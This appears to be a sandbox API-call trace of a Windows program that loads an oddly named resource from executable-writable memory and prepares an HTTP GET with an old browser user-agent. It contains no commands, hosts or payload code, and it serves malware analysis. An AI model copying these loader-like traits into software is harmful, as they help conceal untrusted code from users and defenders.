[0130.592] SysReAllocStringLen (in: pbstr=0x298df70*=0x0, psz="KEY_ENUMERATE_SUB_KEYS", len=0x16 | out: pbstr=0x298df70*="KEY_ENUMERATE_SUB_KEYS") returned 1
[0130.592] SysReAllocStringLen (in: pbstr=0x298df60*=0x0, psz="KEY_QUERY_VALUE", len=0xf | out: pbstr=0x298df60*="KEY_QUERY_VALUE") returned 1
[0130.592] SysReAllocStringLen (in: pbstr=0x298df50*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x298df50*="STANDARD_RIGHTS_EXECUTE") returned 1
[0130.592] SysReAllocStringLen (in: pbstr=0x298df40*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x298df40*="STANDARD_RIGHTS_WRITE") returned 1
[0130.592] SysReAllocStringLen (in: pbstr=0x298df30*=0x0, psz="STANDARD_RIGHTS_READ 2", len=0x16 | out: pbstr=0x298df30*="STANDARD_RIGHTS_READ 2") returned 1
[0130.592] SysReAllocStringLen (in: pbstr=0x298df20*=0x0, psz="STANDARD_RIGHTS_ALL 1", len=0x15 | out: pbstr=0x298df20*="STANDARD_RIGHTS_ALL 1") returned 1
[0130.592] SysReAllocStringLen (in: pbstr=0x298df10*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x298df10*="DELETE") returned 1
[0130.592] SysReAllocStringLen (in: pbstr=0x298df00*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x298df00*="READ_CONTROL") returned 1
[0130.592] SysReAllocStringLen (in: pbstr=0x298def0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x298def0*="WRITE_OWNER") returned 1
[0130.592] SysReAllocStringLen (in: pbstr=0x298dee0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x298dee0*="WRITE_DAC") returned 1
[0130.592] SysReAllocStringLen (in: pbstr=0x298ded0*=0x0, psz="DESKTOP_SWITCHDESKTOP", len=0x15 | out: pbstr=0x298ded0*="DESKTOP_SWITCHDESKTOP") returned 1
[0130.592] SysReAllocStringLen (in: pbstr=0x298dec0*=0x0, psz="DESKTOP_WRITEOBJECTS", len=0x14 | out: pbstr=0x298dec0*="DESKTOP_WRITEOBJECTS") returned 1
[0130.592] SysReAllocStringLen (in: pbstr=0x298deb0*=0x0, psz="DESKTOP_JOURNALRECORD", len=0x15 | out: pbstr=0x298deb0*="DESKTOP_JOURNALRECORD") returned 1
[0130.592] SysReAllocStringLen (in: pbstr=0x298dea0*=0x0, psz="DESKTOP_JOURNALPLAYBACK", len=0x17 | out: pbstr=0x298dea0*="DESKTOP_JOURNALPLAYBACK") returned 1
[0130.592] SysReAllocStringLen (in: pbstr=0x298de90*=0x0, psz="DESKTOP_HOOKCONTROL", len=0x13 | out: pbstr=0x298de90*="DESKTOP_HOOKCONTROL") returned 1
[0130.592] SysReAllocStringLen (in: pbstr=0x298de80*=0x0, psz="DESKTOP_CREATEWINDOW", len=0x14 | out: pbstr=0x298de80*="DESKTOP_CREATEWINDOW") returned 1
[0130.592] SysReAllocStringLen (in: pbstr=0x298de70*=0x0, psz="DESKTOP_CREATEMENU", len=0x12 | out: pbstr=0x298de70*="DESKTOP_CREATEMENU") returned 1
[0130.592] SysReAllocStringLen (in: pbstr=0x298de60*=0x0, psz="DESKTOP_READOBJECTS", len=0x13 | out: pbstr=0x298de60*="DESKTOP_READOBJECTS") returned 1
[0130.592] SysReAllocStringLen (in: pbstr=0x298de50*=0x0, psz="DESKTOP_ENUMERATE", len=0x11 | out: pbstr=0x298de50*="DESKTOP_ENUMERATE") returned 1
[0130.592] SysReAllocStringLen (in: pbstr=0x298de40*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x298de40*="STANDARD_RIGHTS_EXECUTE") returned 1
[0130.592] SysReAllocStringLen (in: pbstr=0x298de30*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x298de30*="STANDARD_RIGHTS_WRITE") returned 1
[0130.592] SysReAllocStringLen (in: pbstr=0x298de20*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x298de20*="STANDARD_RIGHTS_READ") returned 1
[0130.592] SysReAllocStringLen (in: pbstr=0x298de10*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x298de10*="STANDARD_RIGHTS_ALL") returned 1
[0130.592] SysReAllocStringLen (in: pbstr=0x298de00*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x298de00*="DELETE") returned 1
[0130.592] SysReAllocStringLen (in: pbstr=0x298ddf0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x298ddf0*="READ_CONTROL") returned 1
[0130.592] SysReAllocStringLen (in: pbstr=0x298dde0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x298dde0*="WRITE_OWNER") returned 1
[0130.592] SysReAllocStringLen (in: pbstr=0x298ddd0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x298ddd0*="WRITE_DAC") returned 1
[0130.592] SysReAllocStringLen (in: pbstr=0x298ddc0*=0x0, psz="WINSTA_WRITEATTRIBUTES", len=0x16 | out: pbstr=0x298ddc0*="WINSTA_WRITEATTRIBUTES") returned 1
[0130.592] SysReAllocStringLen (in: pbstr=0x298ddb0*=0x0, psz="WINSTA_READSCREEN", len=0x11 | out: pbstr=0x298ddb0*="WINSTA_READSCREEN") returned 1
[0130.592] SysReAllocStringLen (in: pbstr=0x298dda0*=0x0, psz="WINSTA_READATTRIBUTES", len=0x15 | out: pbstr=0x298dda0*="WINSTA_READATTRIBUTES") returned 1
[0130.592] SysReAllocStringLen (in: pbstr=0x298dd90*=0x0, psz="WINSTA_EXITWINDOWS", len=0x12 | out: pbstr=0x298dd90*="WINSTA_EXITWINDOWS") returned 1
[0130.592] SysReAllocStringLen (in: pbstr=0x298dd80*=0x0, psz="WINSTA_ENUMERATE", len=0x10 | out: pbstr=0x298dd80*="WINSTA_ENUMERATE") returned 1
[0130.592] SysReAllocStringLen (in: pbstr=0x298dd70*=0x0, psz="WINSTA_ENUMDESKTOPS", len=0x13 | out: pbstr=0x298dd70*="WINSTA_ENUMDESKTOPS") returned 1
[0130.592] SysReAllocStringLen (in: pbstr=0x298dd60*=0x0, psz="WINSTA_CREATEDESKTOP", len=0x14 | out: pbstr=0x298dd60*="WINSTA_CREATEDESKTOP") returned 1
[0130.592] SysReAllocStringLen (in: pbstr=0x298dd50*=0x0, psz="WINSTA_ACCESSGLOBALATOMS", len=0x18 | out: pbstr=0x298dd50*="WINSTA_ACCESSGLOBALATOMS") returned 1
[0130.592] SysReAllocStringLen (in: pbstr=0x298dd40*=0x0, psz="WINSTA_ACCESSCLIPBOARD", len=0x16 | out: pbstr=0x298dd40*="WINSTA_ACCESSCLIPBOARD") returned 1
[0130.592] SysReAllocStringLen (in: pbstr=0x298dd30*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x298dd30*="STANDARD_RIGHTS_EXECUTE") returned 1
[0130.593] SysReAllocStringLen (in: pbstr=0x298dd20*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x298dd20*="STANDARD_RIGHTS_WRITE") returned 1
[0130.593] SysReAllocStringLen (in: pbstr=0x298dd10*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x298dd10*="STANDARD_RIGHTS_READ") returned 1
[0130.593] SysReAllocStringLen (in: pbstr=0x298dd00*=0x0, psz="STANDARD_RIGHTS_REQUIRED", len=0x18 | out: pbstr=0x298dd00*="STANDARD_RIGHTS_REQUIRED") returned 1
[0130.593] SysReAllocStringLen (in: pbstr=0x298dcf0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x298dcf0*="READ_CONTROL") returned 1
[0130.593] SysReAllocStringLen (in: pbstr=0x298dce0*=0x0, psz="SI_ACCESS_SPECIFIC", len=0x12 | out: pbstr=0x298dce0*="SI_ACCESS_SPECIFIC") returned 1
[0130.593] SysReAllocStringLen (in: pbstr=0x298dcd0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x298dcd0*="WRITE_DAC") returned 1
[0130.593] SysReAllocStringLen (in: pbstr=0x298dcc0*=0x0, psz="FILE_DELETE", len=0xb | out: pbstr=0x298dcc0*="FILE_DELETE") returned 1
[0130.593] SysReAllocStringLen (in: pbstr=0x298dcb0*=0x0, psz="FILE_DELETE_CHILD", len=0x11 | out: pbstr=0x298dcb0*="FILE_DELETE_CHILD") returned 1
[0130.594] SetClassLongA (hWnd=0x801e8, nIndex=-14, dwNewLong=65575) returned 0x0
[0130.594] GetSystemMenu (hWnd=0x801e8, bRevert=0) returned 0x701c1
[0130.594] DeleteMenu (hMenu=0x701c1, uPosition=0xf030, uFlags=0x0) returned 1
[0130.594] DeleteMenu (hMenu=0x701c1, uPosition=0xf000, uFlags=0x0) returned 1
[0130.594] DeleteMenu (hMenu=0x701c1, uPosition=0xf010, uFlags=0x0) returned 1
[0130.595] GetCurrentThreadId () returned 0x764
[0130.595] ResetEvent (hEvent=0xa0) returned 1
[0130.595] GetCurrentThreadId () returned 0x764
[0130.595] GetCurrentThreadId () returned 0x764
[0130.595] GetCurrentThreadId () returned 0x764
[0130.595] ResetEvent (hEvent=0xa0) returned 1
[0130.595] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x8f694, fWinIni=0x0 | out: pvParam=0x8f694) returned 1
[0130.595] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x8f694, fWinIni=0x0 | out: pvParam=0x8f694) returned 1
[0130.595] GetSystemMetrics (nIndex=49) returned 16
[0130.595] GetSystemMetrics (nIndex=50) returned 16
[0130.595] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x8f6dc, fWinIni=0x0 | out: pvParam=0x8f6dc) returned 1
[0130.596] IsWindowVisible (hWnd=0x801e8) returned 0
[0130.596] GetCurrentThreadId () returned 0x764
[0130.596] VirtualQuery (in: lpAddress=0x2961668, lpBuffer=0x8f5ac, dwLength=0x1c | out: lpBuffer=0x8f5ac*(BaseAddress=0x2961000, AllocationBase=0x28a0000, AllocationProtect=0x40, RegionSize=0x52000, State=0x1000, Protect=0x40, Type=0x20000)) returned 0x1c
[0130.596] FindResourceA (hModule=0x28a0000, lpName="TmarxvxinhhmA", lpType=0xa) returned 0x29a8990
[0130.596] FindResourceA (hModule=0x28a0000, lpName="TmarxvxinhhmA", lpType=0xa) returned 0x29a8990
[0130.596] LoadResource (hModule=0x28a0000, hResInfo=0x29a8990) returned 0x29af044
[0130.596] SizeofResource (hModule=0x28a0000, hResInfo=0x29a8990) returned 0xca5
[0130.596] LockResource (hResData=0x29af044) returned 0x29af044
[0130.596] GetCurrentThreadId () returned 0x764
[0130.596] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x8f360, fWinIni=0x0 | out: pvParam=0x8f360) returned 1
[0130.596] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x8f360, fWinIni=0x0 | out: pvParam=0x8f360) returned 1
[0130.596] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x8f360, fWinIni=0x0 | out: pvParam=0x8f360) returned 1
[0130.596] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x8f360, fWinIni=0x0 | out: pvParam=0x8f360) returned 1
[0130.597] GetDC (hWnd=0x0) returned 0x2301087a
[0130.597] GetTextMetricsA (in: hdc=0x2301087a, lptm=0x8f344 | out: lptm=0x8f344) returned 1
[0130.598] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="MS Sans Serif", cchCount1=13, lpString2="Default", cchCount2=7) returned 3
[0130.599] CreateFontIndirectA (lplf=0x8f2fc) returned 0x1a0a086d
[0130.599] SelectObject (hdc=0x2301087a, h=0x1a0a086d) returned 0x18a002e
[0130.599] GetTextMetricsA (in: hdc=0x2301087a, lptm=0x8f37c | out: lptm=0x8f37c) returned 1
[0130.599] SelectObject (hdc=0x2301087a, h=0x18a002e) returned 0x1a0a086d
[0130.599] ReleaseDC (hWnd=0x0, hDC=0x2301087a) returned 1
[0130.599] GetSystemMetrics (nIndex=6) returned 1
[0130.599] VirtualAlloc (lpAddress=0x29c4000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x29c4000
[0130.600] GetDC (hWnd=0x0) returned 0x2301087a
[0130.600] GetTextMetricsA (in: hdc=0x2301087a, lptm=0x8f344 | out: lptm=0x8f344) returned 1
[0130.600] SelectObject (hdc=0x2301087a, h=0x1a0a086d) returned 0x18a002e
[0130.600] GetTextMetricsA (in: hdc=0x2301087a, lptm=0x8f37c | out: lptm=0x8f37c) returned 1
[0130.600] SelectObject (hdc=0x2301087a, h=0x18a002e) returned 0x1a0a086d
[0130.600] ReleaseDC (hWnd=0x0, hDC=0x2301087a) returned 1
[0130.600] GetSystemMetrics (nIndex=6) returned 1
[0130.602] GetDC (hWnd=0x0) returned 0x2301087a
[0130.602] GetTextMetricsA (in: hdc=0x2301087a, lptm=0x8f344 | out: lptm=0x8f344) returned 1
[0130.602] SelectObject (hdc=0x2301087a, h=0x1a0a086d) returned 0x18a002e
[0130.602] GetTextMetricsA (in: hdc=0x2301087a, lptm=0x8f37c | out: lptm=0x8f37c) returned 1
[0130.602] SelectObject (hdc=0x2301087a, h=0x18a002e) returned 0x1a0a086d
[0130.602] ReleaseDC (hWnd=0x0, hDC=0x2301087a) returned 1
[0130.602] GetSystemMetrics (nIndex=6) returned 1
[0130.603] GetDC (hWnd=0x0) returned 0x2301087a
[0130.603] GetTextMetricsA (in: hdc=0x2301087a, lptm=0x8f344 | out: lptm=0x8f344) returned 1
[0130.603] SelectObject (hdc=0x2301087a, h=0x1a0a086d) returned 0x18a002e
[0130.603] GetTextMetricsA (in: hdc=0x2301087a, lptm=0x8f37c | out: lptm=0x8f37c) returned 1
[0130.603] SelectObject (hdc=0x2301087a, h=0x18a002e) returned 0x1a0a086d
[0130.603] ReleaseDC (hWnd=0x0, hDC=0x2301087a) returned 1
[0130.603] GetSystemMetrics (nIndex=6) returned 1
[0130.603] GetDC (hWnd=0x0) returned 0x2301087a
[0130.603] GetTextMetricsA (in: hdc=0x2301087a, lptm=0x8f358 | out: lptm=0x8f358) returned 1
[0130.603] SelectObject (hdc=0x2301087a, h=0x1a0a086d) returned 0x18a002e
[0130.603] GetTextMetricsA (in: hdc=0x2301087a, lptm=0x8f390 | out: lptm=0x8f390) returned 1
[0130.603] SelectObject (hdc=0x2301087a, h=0x18a002e) returned 0x1a0a086d
[0130.603] ReleaseDC (hWnd=0x0, hDC=0x2301087a) returned 1
[0130.603] GetSystemMetrics (nIndex=6) returned 1
[0130.603] GetDC (hWnd=0x0) returned 0x2301087a
[0130.603] GetTextMetricsA (in: hdc=0x2301087a, lptm=0x8f05c | out: lptm=0x8f05c) returned 1
[0130.603] SelectObject (hdc=0x2301087a, h=0x1a0a086d) returned 0x18a002e
[0130.603] GetTextMetricsA (in: hdc=0x2301087a, lptm=0x8f094 | out: lptm=0x8f094) returned 1
[0130.603] SelectObject (hdc=0x2301087a, h=0x18a002e) returned 0x1a0a086d
[0130.603] ReleaseDC (hWnd=0x0, hDC=0x2301087a) returned 1
[0130.603] GetSystemMetrics (nIndex=6) returned 1
[0130.604] GetDC (hWnd=0x0) returned 0x2301087a
[0130.604] GetTextMetricsA (in: hdc=0x2301087a, lptm=0x8f358 | out: lptm=0x8f358) returned 1
[0130.604] SelectObject (hdc=0x2301087a, h=0x1a0a086d) returned 0x18a002e
[0130.604] GetTextMetricsA (in: hdc=0x2301087a, lptm=0x8f390 | out: lptm=0x8f390) returned 1
[0130.604] SelectObject (hdc=0x2301087a, h=0x18a002e) returned 0x1a0a086d
[0130.604] ReleaseDC (hWnd=0x0, hDC=0x2301087a) returned 1
[0130.604] GetSystemMetrics (nIndex=6) returned 1
[0130.604] GetDC (hWnd=0x0) returned 0x2301087a
[0130.604] GetTextMetricsA (in: hdc=0x2301087a, lptm=0x8f05c | out: lptm=0x8f05c) returned 1
[0130.604] SelectObject (hdc=0x2301087a, h=0x1a0a086d) returned 0x18a002e
[0130.604] GetTextMetricsA (in: hdc=0x2301087a, lptm=0x8f094 | out: lptm=0x8f094) returned 1
[0130.604] SelectObject (hdc=0x2301087a, h=0x18a002e) returned 0x1a0a086d
[0130.604] ReleaseDC (hWnd=0x0, hDC=0x2301087a) returned 1
[0130.604] GetSystemMetrics (nIndex=6) returned 1
[0130.604] GetDC (hWnd=0x0) returned 0x2301087a
[0130.604] GetTextMetricsA (in: hdc=0x2301087a, lptm=0x8f358 | out: lptm=0x8f358) returned 1
[0130.604] SelectObject (hdc=0x2301087a, h=0x1a0a086d) returned 0x18a002e
[0130.604] GetTextMetricsA (in: hdc=0x2301087a, lptm=0x8f390 | out: lptm=0x8f390) returned 1
[0130.604] SelectObject (hdc=0x2301087a, h=0x18a002e) returned 0x1a0a086d
[0130.605] ReleaseDC (hWnd=0x0, hDC=0x2301087a) returned 1
[0130.605] GetSystemMetrics (nIndex=6) returned 1
[0130.605] GetDC (hWnd=0x0) returned 0x2301087a
[0130.605] GetTextMetricsA (in: hdc=0x2301087a, lptm=0x8f05c | out: lptm=0x8f05c) returned 1
[0130.605] SelectObject (hdc=0x2301087a, h=0x1a0a086d) returned 0x18a002e
[0130.605] GetTextMetricsA (in: hdc=0x2301087a, lptm=0x8f094 | out: lptm=0x8f094) returned 1
[0130.605] SelectObject (hdc=0x2301087a, h=0x18a002e) returned 0x1a0a086d
[0130.605] ReleaseDC (hWnd=0x0, hDC=0x2301087a) returned 1
[0130.605] GetSystemMetrics (nIndex=6) returned 1
[0130.605] GetDC (hWnd=0x0) returned 0x2301087a
[0130.605] GetTextMetricsA (in: hdc=0x2301087a, lptm=0x8f344 | out: lptm=0x8f344) returned 1
[0130.605] SelectObject (hdc=0x2301087a, h=0x1a0a086d) returned 0x18a002e
[0130.605] GetTextMetricsA (in: hdc=0x2301087a, lptm=0x8f37c | out: lptm=0x8f37c) returned 1
[0130.605] SelectObject (hdc=0x2301087a, h=0x18a002e) returned 0x1a0a086d
[0130.605] ReleaseDC (hWnd=0x0, hDC=0x2301087a) returned 1
[0130.605] GetSystemMetrics (nIndex=6) returned 1
[0130.605] GetDC (hWnd=0x0) returned 0x2301087a
[0130.605] GetTextMetricsA (in: hdc=0x2301087a, lptm=0x8f344 | out: lptm=0x8f344) returned 1
[0130.606] SelectObject (hdc=0x2301087a, h=0x1a0a086d) returned 0x18a002e
[0130.606] GetTextMetricsA (in: hdc=0x2301087a, lptm=0x8f37c | out: lptm=0x8f37c) returned 1
[0130.606] SelectObject (hdc=0x2301087a, h=0x18a002e) returned 0x1a0a086d
[0130.606] ReleaseDC (hWnd=0x0, hDC=0x2301087a) returned 1
[0130.606] GetSystemMetrics (nIndex=6) returned 1
[0130.606] GetDC (hWnd=0x0) returned 0x2301087a
[0130.606] GetTextMetricsA (in: hdc=0x2301087a, lptm=0x8f358 | out: lptm=0x8f358) returned 1
[0130.606] SelectObject (hdc=0x2301087a, h=0x1a0a086d) returned 0x18a002e
[0130.606] GetTextMetricsA (in: hdc=0x2301087a, lptm=0x8f390 | out: lptm=0x8f390) returned 1
[0130.606] SelectObject (hdc=0x2301087a, h=0x18a002e) returned 0x1a0a086d
[0130.606] ReleaseDC (hWnd=0x0, hDC=0x2301087a) returned 1
[0130.606] GetSystemMetrics (nIndex=6) returned 1
[0130.606] GetDC (hWnd=0x0) returned 0x2301087a
[0130.606] GetTextMetricsA (in: hdc=0x2301087a, lptm=0x8f05c | out: lptm=0x8f05c) returned 1
[0130.606] SelectObject (hdc=0x2301087a, h=0x1a0a086d) returned 0x18a002e
[0130.606] GetTextMetricsA (in: hdc=0x2301087a, lptm=0x8f094 | out: lptm=0x8f094) returned 1
[0130.606] SelectObject (hdc=0x2301087a, h=0x18a002e) returned 0x1a0a086d
[0130.606] ReleaseDC (hWnd=0x0, hDC=0x2301087a) returned 1
[0130.606] GetSystemMetrics (nIndex=6) returned 1
[0130.607] GetDC (hWnd=0x0) returned 0x2301087a
[0130.607] GetTextMetricsA (in: hdc=0x2301087a, lptm=0x8f358 | out: lptm=0x8f358) returned 1
[0130.607] SelectObject (hdc=0x2301087a, h=0x1a0a086d) returned 0x18a002e
[0130.607] GetTextMetricsA (in: hdc=0x2301087a, lptm=0x8f390 | out: lptm=0x8f390) returned 1
[0130.607] SelectObject (hdc=0x2301087a, h=0x18a002e) returned 0x1a0a086d
[0130.607] ReleaseDC (hWnd=0x0, hDC=0x2301087a) returned 1
[0130.607] GetSystemMetrics (nIndex=6) returned 1
[0130.607] GetDC (hWnd=0x0) returned 0x2301087a
[0130.607] GetTextMetricsA (in: hdc=0x2301087a, lptm=0x8f05c | out: lptm=0x8f05c) returned 1
[0130.607] SelectObject (hdc=0x2301087a, h=0x1a0a086d) returned 0x18a002e
[0130.607] GetTextMetricsA (in: hdc=0x2301087a, lptm=0x8f094 | out: lptm=0x8f094) returned 1
[0130.607] SelectObject (hdc=0x2301087a, h=0x18a002e) returned 0x1a0a086d
[0130.607] ReleaseDC (hWnd=0x0, hDC=0x2301087a) returned 1
[0130.607] GetSystemMetrics (nIndex=6) returned 1
[0130.607] GetDC (hWnd=0x0) returned 0x2301087a
[0130.607] GetTextMetricsA (in: hdc=0x2301087a, lptm=0x8f358 | out: lptm=0x8f358) returned 1
[0130.607] SelectObject (hdc=0x2301087a, h=0x1a0a086d) returned 0x18a002e
[0130.607] GetTextMetricsA (in: hdc=0x2301087a, lptm=0x8f390 | out: lptm=0x8f390) returned 1
[0130.607] SelectObject (hdc=0x2301087a, h=0x18a002e) returned 0x1a0a086d
[0130.607] ReleaseDC (hWnd=0x0, hDC=0x2301087a) returned 1
[0130.608] GetSystemMetrics (nIndex=6) returned 1
[0130.608] GetDC (hWnd=0x0) returned 0x2301087a
[0130.608] GetTextMetricsA (in: hdc=0x2301087a, lptm=0x8f05c | out: lptm=0x8f05c) returned 1
[0130.608] SelectObject (hdc=0x2301087a, h=0x1a0a086d) returned 0x18a002e
[0130.608] GetTextMetricsA (in: hdc=0x2301087a, lptm=0x8f094 | out: lptm=0x8f094) returned 1
[0130.608] SelectObject (hdc=0x2301087a, h=0x18a002e) returned 0x1a0a086d
[0130.608] ReleaseDC (hWnd=0x0, hDC=0x2301087a) returned 1
[0130.608] GetSystemMetrics (nIndex=6) returned 1
[0130.608] GetDC (hWnd=0x0) returned 0x2301087a
[0130.608] GetTextMetricsA (in: hdc=0x2301087a, lptm=0x8f358 | out: lptm=0x8f358) returned 1
[0130.608] SelectObject (hdc=0x2301087a, h=0x1a0a086d) returned 0x18a002e
[0130.608] GetTextMetricsA (in: hdc=0x2301087a, lptm=0x8f390 | out: lptm=0x8f390) returned 1
[0130.608] SelectObject (hdc=0x2301087a, h=0x18a002e) returned 0x1a0a086d
[0130.608] ReleaseDC (hWnd=0x0, hDC=0x2301087a) returned 1
[0130.608] GetSystemMetrics (nIndex=6) returned 1
[0130.608] GetDC (hWnd=0x0) returned 0x2301087a
[0130.608] GetTextMetricsA (in: hdc=0x2301087a, lptm=0x8f05c | out: lptm=0x8f05c) returned 1
[0130.608] SelectObject (hdc=0x2301087a, h=0x1a0a086d) returned 0x18a002e
[0130.608] GetTextMetricsA (in: hdc=0x2301087a, lptm=0x8f094 | out: lptm=0x8f094) returned 1
[0130.608] SelectObject (hdc=0x2301087a, h=0x18a002e) returned 0x1a0a086d
[0130.608] ReleaseDC (hWnd=0x0, hDC=0x2301087a) returned 1
[0130.608] GetSystemMetrics (nIndex=6) returned 1
[0130.609] GetDC (hWnd=0x0) returned 0x2301087a
[0130.609] GetTextMetricsA (in: hdc=0x2301087a, lptm=0x8f344 | out: lptm=0x8f344) returned 1
[0130.609] SelectObject (hdc=0x2301087a, h=0x1a0a086d) returned 0x18a002e
[0130.609] GetTextMetricsA (in: hdc=0x2301087a, lptm=0x8f37c | out: lptm=0x8f37c) returned 1
[0130.609] SelectObject (hdc=0x2301087a, h=0x18a002e) returned 0x1a0a086d
[0130.609] ReleaseDC (hWnd=0x0, hDC=0x2301087a) returned 1
[0130.609] GetSystemMetrics (nIndex=6) returned 1
[0130.611] SysReAllocStringLen (in: pbstr=0x29cf388*=0x0, psz="GET", len=0x3 | out: pbstr=0x29cf388*="GET") returned 1
[0130.611] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0130.611] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0130.611] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0130.611] SysReAllocStringLen (in: pbstr=0x29cf388*="GET", psz="GET", len=0x3 | out: pbstr=0x29cf388*="GET") returned 1
[0130.611] SysReAllocStringLen (in: pbstr=0x29cf3b8*=0x0, psz="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1)", len=0x39 | out: pbstr=0x29cf3b8*="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1)") returned 1
[0130.611] InternetQueryOptionW (in: hInternet=0x0, dwOption=0x6, lpBuffer=0x8f3e0, lpdwBufferLength=0x8f3e4 | out: lpBuffer=0x8f3e0, lpdwBufferLength=0x8f3e4) returned 1
[0130.652] InternetSetOptionW (hInternet=0x0, dwOption=0x6, lpBuffer=0x8f3e0, dwBufferLength=0x4) returned 1
[0130.653] VirtualFree (lpAddress=0x29d0000, dwSize=0x4000, dwFreeType=0x4000) returned 1
[0130.653] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x29c6490, cbMultiByte=3, lpWideCharStr=0x8e318, cchWideChar=2047 | out: lpWideCharStr="GET") returned 3
[0130.653] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0130.653] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0130.653] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0130.653] SysReAllocStringLen (in: pbstr=0x29cf388*="GET", psz="GET", len=0x3 | out: pbstr=0x29cf388*="GET") returned 1
[0130.653] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0130.653] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0130.653] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0130.653] SysReAllocStringLen (in: pbstr=0x29cf388*="GET", psz="GET", len=0x3 | out: pbstr=0x29cf388*="GET") returned 1
[0130.660] GetTextExtentPoint32A (in: hdc=0x2301087a, lpString="0", c=1, psizl=0x8f4d4 | out: psizl=0x8f4d4) returned 1
[0130.660] IsIconic (hWnd=0x9019e) returned 0
[0130.660] GetClientRect (in: hWnd=0x9019e, lpRect=0x8f4d4 | out: lpRect=0x8f4d4) returned 1
[0130.660] GetWindowLongA (hWnd=0x9019e, nIndex=-16) returned 116326400
[0130.660] GetWindowLongA (hWnd=0x9019e, nIndex=-16) returned 116326400
[0130.660] IsIconic (hWnd=0x9019e) returned 0
[0130.660] GetClientRect (in: hWnd=0x9019e, lpRect=0x8f41c | out: lpRect=0x8f41c) returned 1
[0130.660] GetWindowLongA (hWnd=0x9019e, nIndex=-16) returned 116326400
[0130.660] GetWindowLongA (hWnd=0x9019e, nIndex=-16) returned 116326400
[0130.660] IsIconic (hWnd=0x9019e) returned 0
[0130.660] GetClientRect (in: hWnd=0x9019e, lpRect=0x8f3ec | out: lpRect=0x8f3ec) returned 1
[0130.660] GetWindowLongA (hWnd=0x9019e, nIndex=-16) returned 116326400
[0130.660] GetWindowLongA (hWnd=0x9019e, nIndex=-16) returned 116326400
[0130.660] IsIconic (hWnd=0x9019e) returned 0
[0130.660] GetClientRect (in: hWnd=0x9019e, lpRect=0x8f3ec | out: lpRect=0x8f3ec) returned 1
[0130.660] FlatSB_SetScrollProp (param_1=0x9019e, index=0x200, newValue=0x0, param_4=0) returned 0
[0130.660] GetSysColor (nIndex=20) returned 0xffffff
[0130.660] FlatSB_SetScrollProp (param_1=0x9019e, index=0x80, newValue=0xffffff, param_4=0) returned 0
[0130.660] FlatSB_SetScrollInfo (param_1=0x9019e, code=0, psi=0x8f42a, fRedraw=1) returned 0
[0130.661] GetWindowLongA (hWnd=0x9019e, nIndex=-16) returned 116326400
[0130.661] IsIconic (hWnd=0x9019e) returned 0
[0130.661] GetClientRect (in: hWnd=0x9019e, lpRect=0x8f3ec | out: lpRect=0x8f3ec) returned 1
[0130.661] GetWindowLongA (hWnd=0x9019e, nIndex=-16) returned 116326400
[0130.661] IsIconic (hWnd=0x9019e) returned 0
[0130.661] GetClientRect (in: hWnd=0x9019e, lpRect=0x8f3ec | out: lpRect=0x8f3ec) returned 1
[0130.661] GetWindowLongA (hWnd=0x9019e, nIndex=-16) returned 116326400
[0130.661] IsIconic (hWnd=0x9019e) returned 0
[0130.661] GetClientRect (in: hWnd=0x9019e, lpRect=0x8f3ec | out: lpRect=0x8f3ec) returned 1
[0130.661] FlatSB_SetScrollProp (param_1=0x9019e, index=0x100, newValue=0x0, param_4=0) returned 0
[0130.661] GetSysColor (nIndex=20) returned 0xffffff
[0130.661] FlatSB_SetScrollProp (param_1=0x9019e, index=0x40, newValue=0xffffff, param_4=0) returned 0
[0130.661] FlatSB_SetScrollInfo (param_1=0x9019e, code=1, psi=0x8f42a, fRedraw=1) returned 0
[0130.661] GetWindowLongA (hWnd=0x9019e, nIndex=-16) returned 116326400
